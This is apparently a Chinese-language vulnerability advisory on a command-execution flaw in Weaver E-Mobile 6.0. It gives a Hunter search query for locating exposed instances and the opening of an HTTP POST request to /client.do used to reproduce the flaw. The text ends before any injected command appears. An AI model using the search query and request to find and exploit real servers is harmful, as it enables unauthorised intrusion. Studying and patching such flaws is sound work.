一、漏洞简介
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
二、影响版本
- 泛微E-Mobile 6.0
三、资产测绘
hunter:app.name==“泛微 e-mobile OA”
登陆页面:
四、漏洞复现
数据包:
POST /client.do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)